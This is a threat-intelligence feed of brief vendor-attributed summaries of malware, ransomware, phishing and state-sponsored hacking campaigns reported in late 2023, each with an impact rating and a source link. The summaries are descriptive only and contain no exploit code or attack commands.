- An_increase_of_malicious_ads_on_Google_searches_for_Zoom
- Date of Scan:
- 2023-12-13
- Impact:
- LOW
- Summary:
- This month, Malwarebytes researchers have noticed a spike of malicious ads on Google searches for “Zoom”, the video conferencing software. Threat actors have been switching and changing between different keywords for software downloads such as “Advanced IP Scanner” or “WinSCP” normally geared toward IT administrators. So researchers shared the details of two cases: 1st – about a new loader which we have not seen mentioned publicly before called HiroshimaNukes and 2nd – a campaign dropping FakeBat loader where the threat actor tracked victims via a panel that was new to us, called Hunting panel 1.40.
—
- Intel Source:
- Sentilone
- Intel Name:
- Mallox_Resurrected
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- Sentilone analysts shared their summary and report of recent Mallox activity, explained the group’s initial access methods, and provided a high-level analysis of recent Mallox payloads. Up today this group continues to steal and leak a steady stream of enterprise data.
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_JetBrains_TeamCity_CVE_Globally
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- The FBI, U.S. CISA, U.S. NSA, Polish Military Counterintelligence Service, CERT Polska (CERT.PL), and the UK’s NCSC concluded the JetBrains TeamCity software was exploited by Russian cyber actors APT 29 aka the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard with CVE-2023-42793 at a massive spread, targeting servers hosting that JetBrains TeamCity software last couple months.
—
- Intel Source:
- Rewterz
- Intel Name:
- APT37_also_known_as_ScarCruft_or_Red_Eyes_activity
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- APT37, aka ScarCruft or Red Eyes, is a state-sponsored cyber espionage group originating from North Korea. The group has been active for more than 10 years and targeted previous victims in South Korea. This time it started attacks against entities in other countries, including Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and various parts of the Middle East. One of the threats APT37 has been associated with is the Goldbackdoor and RokRAT.
—
- Intel Source:
- Elastic
- Intel Name:
- The_updated_GULOADER_analysis
- Date of Scan:
- 2023-12-12
- Impact:
- LOW
- Summary:
- Elastic Security Labs researchers follow on the active threat monitor active threats like GULOADER, aka CloudEyE which is a very triccking shellcode downloader that has been highly active for years while under constant development. One of these recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign.
Source:
https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader
—
- Intel Source:
- X-Force
- Intel Name:
- The_delivery_of_the_ITG05_campaign_exclusive_Headlace_backdoor
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- X-Force observed the ITG05 campaign which is likely a Russian state-sponsored group related to the ongoing Israel-Hamas war to assist the delivery of a custom backdoor called HeadLace. This new campaign is against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance, and diplomatic centers,” security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA4557_Targets_Recruiters_Directly_via_Email
- Date of Scan:
- 2023-12-12
- Impact:
- LOW
- Summary:
- Recently, Proofpoint observed an attack from the TA455 campaign which used both the new method of attacks where recruiters send emails directly as well as the older technique of applying to jobs posted on job boards starting off the attack chain. Specifically, in the attack chain that uses the direct email technique, once the recipient responds to the initial email, the actor is observed responding with a URL linking to an actor-controlled website posing as a candidate’s resume.
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_series_of_related_attacks_against_organizations_with_new_tool_set
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers observed a series of apparently related attacks against organizations in the Middle East, Africa and the U.S. Unit 42 is sharing these results with the purpose of helping organizations defend against the tools observed here.
Source:
https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
—
- Intel Source:
- Group-IB
- Intel Name:
- New_Linux_Remote_Access_Trojan
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- The Group-IB Threat Intelligence unit shared their insights on existing Linux Remote Access Trojan (RAT) Krasue. This RAT has been used against organizations in Thailand. Krasue poses a severe risk to critical systems and sensitive data, which could grant attackers remote access to the targeted network. The malware also features rootkits embedded in the binary. Group-IB researchers also confirmed that Krasue was used against telecommunications companies, although it has likely been leveraged in attacks against organizations in other verticals. The Group-IB team in their insights shared the Krasue’s key characteristics, its functionalities, potential impact, and the measures that organizations should take to defend against the evolving threat.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_Backdoor_Disguised_as_Data_Leak_Material_in_Targeted_Campaign
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has identified a targeted campaign distributing a malicious executable file disguised as personal data leak material. The malware functions as a backdoor, receiving obfuscated commands in XML format from threat actors. Although the final behavior could not be observed due to the closure of the command and control (C2) server, the malware involves the creation of obfuscated files, including legitimate doc files, to deceive users. The threat actor employs various scripts, such as Operator.jse and WindowsHotfixUpdate.ps1, creating a complex execution chain
—
- Intel Source:
- Sentilone
- Intel Name:
- Sandman_APT
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- SentinelLabs, Microsoft, and PwC threat intelligence researchers shared the joint report with the information on the Sandman APT cluster. They saw links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. Their report included victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.
Source:
https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Editbot_Stealer_Spreads
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- Cyble researchers observed a WinRAR archive file on VirusTotal with minimal detection. Their analysis indicated that it is part of a new campaign targeted at Social Media users. This campaign attack surrounds a multi-stage attack, where each phase has a particular role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.
Source:
https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/
—
- Intel Source:
- Talos
- Intel Name:
- Operation_Blacksmith
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- This month Cisco Talos researchers discovered a new campaign “Operation Blacksmith” made by the Lazarus Group using three new DLang-based malware families, two of which are remote access trojans (RATs), it uses Telegram bots and channels as a medium of command and control (C2) communications. Researchers linked this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
Source:
https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_s_PlugX_new_variant_attacks
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- The Lab52 team did team analyses of the campaign in which attackers started a new variant of the PlugX malware. The details and the various artifacts used showed that it has a lot of similarities with the SmugX campaign, attributed to threat actors Red Delta and Mustang Panda, allegedly linked to the Chinese government. The analysts observed that these attacks are targeted against Taiwanese government and diplomats.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Unraveling_the_Complex_AsyncRAT_Infection_Chai
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- Trend Micro’s Managed XDR (MxDR) team has conducted an in-depth analysis of the AsyncRAT (Remote Access Tool) infection chain, revealing the tool’s sophisticated capabilities, including keylogging and remote desktop control. The blog post explores the misuse of the legitimate Microsoft process aspnet_compiler.exe by malicious actors, shedding light on evolving adversary tactics. The investigation details the entire timeline of events, from the initial download to the establishment of command-and-control connections. The analysis highlights AsyncRAT’s adaptability across diverse attack vectors, including phishing campaigns and ransomware infections.
—
- Intel Source:
- Fortinet
- Intel Name:
- MrAnon_Stealer_Spreads_via_Email
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- This month FortiGuard Labs discovered an email phishing campaign using misleading booking information to attempt victims into clicking on a malicious PDF file. These malicious PDF downloads run a PowerShell script to bring the MrAnon Stealer malware. This malware is a Python-based information stealer condensed with cx-Freeze to vaporize detection. MrAnon Stealer steals its victims’ credentials, system information, browser sessions, and cryptocurrency extensions.
—
- Intel Source:
- Cyberint
- Intel Name:
- Israel_Hamas_vs_Ukraine_Russia_cyber_war
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- The conflict that happened in Israel on the morning of October 7 between Israel and Hamas, has not only engaged physical battlegrounds but has also drawn the multiple threat actors in cyberspace as well as in the Russian-Ukrainian conflict. Cyberint shared their deep analysis of all cases that happened during these 2 different wars.
Source:
https://cyberint.com/blog/research/israel-hamas-vs-ukraine-russia-war/
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_creation_by_Kimsuky_Group_using_AutoIt
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- ASEC is constantly following the Kimsuky group’s attacks using LNK-type malware and studying their attack cases. The Kimsuky group installs remote control malware to control the infected system to gain initial access. Kimsuky’s malware also includes open-source or commercial malware such as XRat, HVNC, Amadey, and Metasploit Meterpreter. This time ASEC analyzed Amadey and RftRAT which were recently found being distributed.
—
- Intel Source:
- Esentire
- Intel Name:
- The_exploits_for_Citrix_Bleed_are_in_the_wild
- Date of Scan:
- 2023-12-09
- Impact:
- HIGH
- Summary:
- 2 months ago, the eSentire team some alerts, and after investigating it was tied to a LockBit ransomware attack. The first indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com. The eSentire Threat Response Unit continued an investigation of this malicious activity and with confidence concluded that the threat actor gained the initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allow the attackers to bypass authentication by retrieving the session tokens. The exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.
Source:
https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware
—
- Intel Source:
- PaloAlto
- Intel Name:
- Fighting_Ursa_two_malicious_campaigns
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed this group Fighting Ursa APT28 using this a zero-day exploit in Microsoft Outlook CVE-2023-23397 vulnerability over the past 20 months to target at least 30 organizations within 14 nations that are of likely strategic intelligence value to the Russian government and its military. This time this threat actor group conducted at least two campaigns with this vulnerability that have been made public.
Source:
https://unit42.paloaltonetworks.com/russian-apt-fighting-ursa-exploits-cve-2023-233397/
—
- Intel Source:
- Esentire
- Intel Name:
- DanaBot_trojan_deploying_IcedID
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- Last month, the eSentire Threat Response analysts observed again DanaBot, a banking Trojan renowned for its ability to steal banking credentials, personal information, and hVNC. This malware was being employed to deliver IcedID, a banking Trojan.
Source:
https://www.esentire.com/blog/danabots-latest-move-deploying-icedid
—
- Intel Source:
- Esentire
- Intel Name:
- Exploitation_of_Qlik_Sense_servers
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- eSentire has seen multiple instances of threat actors exploiting vulnerabilities in Qlik Sense to get initial access into victim organizations. Qlik Sense is a data analytics platform; there is a high probability that Qlik Sense servers are unpatched and internet-facing, and will be targeted in an ongoing campaign.
Source:
https://www.esentire.com/security-advisories/qlik-sense-exploitation
—
- Intel Source:
- Sucuri
- Intel Name:
- The_evolution_of_the_ATMZOW_skimmer
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- Sucuri research team shared their deep look into recent Google Tag Manager containers used in e-commerce malware, examine some newer forms of obfuscation techniques used in the malicious code, and tracked the evolution of the ATMZOW skimmer linked to widespread Magento website infections since 2015.
—
- Intel Source:
- Domaintools
- Intel Name:
- Merry_Phishmas_phishing_activities
- Date of Scan:
- 2023-12-08
- Impact:
- LOW
- Summary:
- During the holidays, DomainTools is warning the public to stay extremely careful against the threat of USPS package redelivery phishing attacks. DomainTools is monitoring several USPS phishing campaigns, which include activity that coordinates with known tactics, techniques, and procedures of the China-based “Chenlun” phishing actor and their affiliates groups.
—
- Intel Source:
- Splunk
- Intel Name:
- Detailed_analysis_of_PlugX_Malware
- Date of Scan:
- 2023-12-07
- Impact:
- LOW
- Summary:
- The Splunk researchers team shared their deep analysis on a PlugX variant, uncovering all sides of malicious payload, tactics, and impact on the digital realm, including: PlugX .DAT Payload Extraction, PlugX .CFG Decryption, PlugX Extractor Tool, PlugX Analysis.
—
- Intel Source:
- Patchstack
- Intel Name:
- A_huge_spike_scale_phishing_campaign
- Date of Scan:
- 2023-12-07
- Impact:
- LOW
- Summary:
- The Patchstack team has been keeping eye on a huge spike scale phishing campaign with different variants of phishing emails going around that are notifying users about a new security vulnerability in their WordPress website, supposedly a “Remote Code Execution (RCE)” vulnerability “CVE-2023-45124” and asked to patch right away by using a “Patch created by the WordPress Team”. The email was a fake and the plugin asked to download and install was malicious and can infect your website with a backdoor and malicious administrator account.
—
- Intel Source:
- CISA, Microsoft
- Intel Name:
- Star_Blizzard_increases_sophistication_and_evasion_in_ongoing_attacks
- Date of Scan:
- 2023-12-07
- Impact:
- HIGH
- Summary:
- The CISA, UK-NCSC, Australian Signals Directorate’s Australian Cyber Security Centre, Canadian Centre for Cyber Security), New Zealand National Cyber Security Centre, and the U.S. NSA, FBI, and Cyber Command Cyber National Mission Force (CNMF) shared their security warning about Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. This threat actor used to be known as SEABORGIUM, also Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie continues to use spear-phishing campaigns against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity.
Source:
https://www.cisa.gov/news-events/alerts/2023/12/07/cisa-and-international-partners-release-advisory-russia-based-threat-actor-group-star-blizzard
https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/
—
- Intel Source:
- Securelist
- Intel Name:
- New_Trojan_BlueNoroff_loader_attacking_macOS_users
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- Securelist uncovered a new variety of malicious loader that attacks macOS, suspected to be the BlueNoroff APT gang and the known campaign RustBucket. The threat actor is known to attack financial organizations tied to the activity is related to cryptocurrency, as well as individuals who hold crypto assets or take an interest in the subject.
Source:
https://securelist.com/bluenoroff-new-macos-malware/111290/
—
- Intel Source:
- Securelist
- Intel Name:
- New_macOS_Trojan_Proxy_piggybacking_on_cracked_software
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- Securelist researchers identified several ruptured applications spread by illegal websites and loaded with a Trojan-Proxy. Attackers use this malware to gain money by building a proxy server network or to perform illegal activities on behalf of the victim: to launch attacks on websites, companies, and individuals, and buy guns, drugs, and other illicit goods.
Source:
https://securelist.com/trojan-proxy-for-macos/111325/
—
- Intel Source:
- Unit42
- Intel Name:
- Unidentified_Infostealer_Dec5
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- Loader EXE leads to unidentified malware with C2 using encoded/encrypted TCP traffic on 91.92.120[.]119.
Source:
https://twitter.com/Unit42_Intel/status/1732411660013273387
https://www.linkedin.com/posts/unit42_malwaretraffic-timelythreatintel-unit42threatintel-activity-7138177279964151809–S66/
—
- Intel Source:
- ASEC
- Intel Name:
- WSF_Script_Variant_of_AsyncRAT_Malware_Campaign
- Date of Scan:
- 2023-12-06
- Impact:
- MEDIUM
- Summary:
- A recent analysis by the AhnLab Security Emergency Response Center (ASEC) reveals a shift in the distribution method of the AsyncRAT malware. Previously distributed through files with the .chm extension, the malware is now using WSF script format, found in compressed (.zip) files distributed via email URLs. The WSF script, when executed, triggers a sequence of events, downloading and running Visual Basic scripts that ultimately execute the AsyncRAT malware. The campaign employs fileless attack techniques, bypassing UAC and utilizing various scripts to maintain persistence, collect system information, and exfiltrate data.
—
- Intel Source:
- Wordfence
- Intel Name:
- WordPress_Phishing_Campaign_Targets_Users_with_Fake_Security_Patch_Plugin
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Wordfence Threat Intelligence Team has identified a phishing campaign targeting WordPress users, falsely warning of a non-existent Remote Code Execution vulnerability (CVE-2023-45124). The phishing email instructs users to download a fake “Patch” plugin, leading to a malicious backdoor. The plugin adds an administrator user (wpsecuritypatch) and communicates with a command and control domain. The separate backdoor provides multiple forms of access, enabling full control over the WordPress site and the server’s web user account.
—
- Intel Source:
- Cyble
- Intel Name:
- Return_of_the_Banking_Trojan_TrickMo
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Cyble researchers discovered a new variant of the banking trojan via VirusTotal Intelligence back in September 2023. This variant of TrickMo demonstrated the advanced functionalities upon comparison with the last analysis, employing overlay injection techniques to extract credentials from targeted applications instead of relying on screen recording, as observed in the first iteration.
Source:
https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/
—
- Intel Source:
- CuratedIntel
- Intel Name:
- Global_credit_card_information_campaigns_targeting_users_in_different_services
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Tas and Curated Intel researchers shared their discovery on the newly observed method of phishing utilizing chat functionality in multiple web/mobile applications. This campaign of phishing introduced a novel TTP of utilizing the postal, reservation, and e-commerce services chat functionality.
Source:
https://www.curatedintel.org/2023/12/curated-intel-threat-report-multi.html
—
- Intel Source:
- Cyberint
- Intel Name:
- Lumma_Stealer_threat_in_the_expanding_infostealers_Ecosystem
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Lumma Stealer, identified in August 2022, continues to evolve as a prominent InfoStealer. Orchestrated by threat actor “Shamel,” it targets crypto users, extracting sensitive data through various methods. Priced at $140-$160 per month on the dark web, Lumma Stealer poses a significant risk with potential financial losses, compromised security, and privacy breaches. Its impact extends to organizational reputational damage. Businesses are urged to stay vigilant and implement robust cybersecurity measures against this evolving threat.
Source:
https://cyberint.com/blog/research/the-lumma-stealer-infostealer-the-details/
—
- Intel Source:
- Cybereason
- Intel Name:
- DJvu_Variant_Xaro_Delivered_via_Freeware_Loader
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- The Cybereason Security Services Team is investigating incidents involving a variant of the DJvu ransomware named “Xaro,” delivered through loaders masquerading as freeware. This attack aims at data exfiltration, information theft, and file encryption for ransom. Notable observations include the .xaro extension appended to affected files and a “shotgun” infection approach, deploying various malware strains alongside Xaro.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA422_s_Dedicated_Exploitation
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Since the middle of the year 2023, Proofpoint researchers have observed regular TA422 (APT28) phishing activity, where the threat actor leveraged patched vulnerabilities including CVE-2023-23397 to send, at times, high-volume campaigns to targets in Europe and North America. TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity.
—
- Intel Source:
- Cyfirma
- Intel Name:
- DanaBot_Stealer
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Cyfirma analysts provided their comprehensive analysis focuses on the information stealer DanaBot and presents a thorough examination of its functionality and capabilities. DanaBot is a stealthy and versatile malware that infiltrates computers to steal valuable information for monetization. Unlike ransomware that demands immediate payment, DanaBot operates discreetly, prioritizing long-term persistence and the theft of sensitive data.
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_Adobe_ColdFusion_or_Initial_Access_to_Government_Servers
- Date of Scan:
- 2023-12-05
- Impact:
- HIGH
- Summary:
- The CISA has released a Cybersecurity Advisory to confirm the exploitation of CVE-2023-26360 by unknown threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability is about an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). Exploitation of this CVE can result in arbitrary code execution.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a
—
- Intel Source:
- CISA
- Intel Name:
- Exploit_of_PLCs_in_US_Water_and_Wastewater_Systems_Facilities
- Date of Scan:
- 2023-12-05
- Impact:
- HIGH
- Summary:
- The FBI, CISA, NSA, EPA, and the Israel National Cyber Directorate released their joined Security Advisory to share about continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat cyber actors. The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs).
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a
—
- Intel Source:
- Trellix
- Intel Name:
- Unveiling_Akira_Ransomware
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Discovered in 2023, the Akira ransomware employs a double extortion scheme, targeting diverse sectors with victims primarily in the United States. Using various initial access methods, including multi-factor authentication exploitation and spear phishing, the ransomware exfiltrates data, encrypts files with ChaCha, and demands payment for decryption and data protection.
Source:
https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_group_Trigona_operation
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Trigona threat actors were observed leveraging the vulnerability CVE-2021-40539. Trigona also targets compromised accounts by obtaining access from network access brokers. Based on a combination of Trend’s open-source intelligence (OSINT) research and investigation of the leak site, Trigona ransomware compromised 33 organizations within a short period in North America, Europe, Enterprises in Asia-Pacific and Latin America, and the Caribbean were also compromised.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-trigona
—
- Intel Source:
- Perception point
- Intel Name:
- Multi_Layered_Invoice_Campaign_Unveils_Stealthy_LUMMA_InfoStealer_Attack
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Perception Point recently uncovered a sophisticated malware attack leveraging a multi-layered fake invoice campaign. The threat actor, impersonating a financial services company, prompts users to click on a seemingly legitimate invoice link, creating an evasion tactic. The attacker exploits a breached website to redirect users, initiating the download of a JavaScript file containing the LUMMA InfoStealer malware. LUMMA, distributed through Malware-as-a-Service, executes complex processes from unusual locations, adding layers of obfuscation to the attack.
Source:
https://perception-point.io/blog/behind-the-attack-lumma-malware/
—
- Intel Source:
- CADO Security
- Intel Name:
- P2PInfect
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Cado analysts have been monitoring the development of a cross-platform botnet “P2Pinfect”. As the name suggests, the malware – written in Rust – acts as a botnet agent, connecting infected hosts in a peer-to-peer topology.
Source:
https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/
—
- Intel Source:
- Bolster
- Intel Name:
- Vast_Parcel_Delivery_Phishing_Campaign
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Bolsters’s researchers have discovered new scam tactics. It is a domain impersonating Walmart, precesely designed to mimic the appearance of the USPS.com website.
—
- Intel Source:
- STR
- Intel Name:
- Threat_Actors_Target_MSSQL_Servers
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- In an interesting attack campaign, the Securonix Threat Research team has identified threat actors targeting exposed Microsoft SQL (MSSQL) services using brute force attacks. One of the things that makes DB#JAMMER stand out is how the attacker’s tooling infrastructure and payloads are used. The ransomware payload of choice appears to be a newer variant of Mimic ransomware called FreeWorld.
—
- Intel Source:
- Cybereason
- Intel Name:
- Compromise_of_SEO_Poisoning_and_Large_Payloads_by_GootLoader_threat
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- The Cybereason IR team captured different attack scenarios, which started from a GootLoader infection to ultimately deployed more capabilities. Cybereason IR team observed payloads with large sizes (40MB and more) and masquerading with legitimate JavaScript code to evade security mechanisms, displayed fast-moving behaviors, also observed post-infection frameworks being deployed: Cobalt Strike and SystemBC, which is usually leveraged for data exfiltration, SEO Poisoning techniques used to spread malware.
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Cyber_Espionage_Threat_Targets_US_Aerospace_Industry
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- BlackBerry’s Threat Research team has uncovered a sophisticated cyber-espionage campaign, naming the threat actor AeroBlade, targeting a U.S. aerospace organization. Initiated through spear-phishing, the attacker evolved their tactics from a testing phase in September 2022 to a more advanced stage in July 2023. The attacker’s goal, assessed with medium to high confidence, is commercial cyber espionage.
Source:
https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry
—
- Intel Source:
- thedfirreport
- Intel Name:
- BlueSky_Ransomware_Emerges
- Date of Scan:
- 2023-12-04
- Impact:
- LOW
- Summary:
- In December, a notable intrusion occurred, targeting public-facing MSSQL servers, resulting in the deployment of BlueSky ransomware. This report unveils the threat actors’ techniques, starting with a MSSQL brute force attack on the “sa” account. Leveraging Cobalt Strike and Tor2Mine, the attackers executed post-exploitation activities. Within an hour, BlueSky ransomware spread network-wide. The report provides a comprehensive breakdown, including threat actor profiles, initial access details, execution events, persistence methods, privilege escalation tactics, and the impact of the ransomware.
Source:
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- South_Korea_and_Uzbekistan_are_Targeted_by_SugarGh0st_RAT
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified a new RAT, “SugarGh0st,” in a malicious campaign. They assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2. They observed two infection chains leveraging Windows Shortcut embedded with malicious JavaScript to deliver the components to drop and launch the SugarGh0st payload.
Source:
https://blog.talosintelligence.com/new-sugargh0st-rat/
—
- Intel Source:
- Infoblox
- Intel Name:
- Early_Detection_of_ROMCOM_malicious_DNS
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- This article discusses the malicious domain ROMCOM and the threat actor group Void Rabisu, and how Infoblox’s DNS Early Detection Program identified multiple ROMCOM malicious domains as suspicious an average of 91.6 days before they were identified as malicious in OSINT. It also explains how ROMCOMLITE, a new variation of the malware, is being used to target organizations in Ukraine and various NATO countries, and how Infoblox’s suspicious domain data can help customers reduce risk and increase the return on investment for their threat intelligence program.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-romcom/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Fake_Virus_Alerts
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- ScamClub has been running a malvertising campaign since 2018, redirecting mobile users on high profile websites to a fake security alert connected to a malicious McAfee affiliate. The malicious JavaScripts were hosted on Google’s cloud but have since moved to Azure’s CDN. Malwarebytes for Android can protect users from this campaign. Indicators of compromise are provided.
—
- Intel Source:
- Arctic Wolf
- Intel Name:
- Cactus_Ransomware_Campaign_Exploiting_Vulnerabilities_in_Qlik_Sense
- Date of Scan:
- 2023-12-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Arctic Wolf Labs have observed a new catus ransomware compaign exploiting the publicly-exposed installations of Qlik Sense. This campaign marks the first documented instance, which is aware that where threat actors are deploying Cactus ransomware and exploiting vulnerabilities in Qlik Sense for initial access.
Source:
https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Attacks_against_organizations_in_the_Middle_East_and_Africa
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- Unit 42 researchers identified a tool set used by a threat actor against Middle East, Africa and the US, including Agent Racoon malware, Ntospy, and a customized version of Mimikatz. The tool set was used to exfiltrate confidential information, such as emails and Roaming Profiles, and was mapped to the MITRE ATT&CK matrix.
Source:
https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_the_new_Java_Based_SAW_RAT
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- This article provides an analysis of the Saw RAT, a Java-based RAT embedded in a ZIP archive file. It outlines the infiltration strategy, which involves a maliciously crafted ZIP archive containing a PDF icon shortcut, a JavaScript file, a deceptive PDF file, and a malicious JAR file. The malware establishes a connection with a C&C server and carries out various functions in response to commands. Recommendations for best practices to protect against such attacks are also provided.
Source:
https://cyble.com/blog/uncovering-the-new-java-based-saw-rats-infiltration-strategy-via-lnk-files/
—
- Intel Source:
- Huntress
- Intel Name:
- Observed_the_use_of_Finger_a_client_server_application
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- Huntress analysts observed the use of Finger, a client-server application, to exfiltrate data from an endpoint. The threat actor created a webshell on an MSExchange server and used Finger to download a file and gain situational awareness. In September 2020, an advisory was published by security researcher John Page. MITRE ATT&CK mappings and a statistic from Huntress’ SMB Threat Report are also provided.
Source:
https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Distributing_Using_Sale_of_Personal_Information_as_Bait
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- Researchers from ASEC have uncovered a case of virus spreading that used the selling of personal data as a lure. This attack case uses a hacking method known as social engineering.
—
- Intel Source:
- ASEC
- Intel Name:
- South_Korean_Research_Institutes_Targeted_by_Kimsuky
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the Kimsuky threat organization is sending malicious JSE files to South Korean research institutes under the appearance of an import declaration. In the end, the threat actor employs a backdoor to carry out commands and steal data.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_release_of_new_malware_Nova_infostealer
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- MaaS operator Sordeal has developed the Nova infostealer, a sophisticated malware with alarming capabilities such as credential harvesting, Discord injection, and targeting crypto wallets. Organizations must enhance their threat detection and fortify defenses to mitigate the risks posed by Nova. Strategic, tactical, and management recommendations are provided to help protect against the malware.
Source:
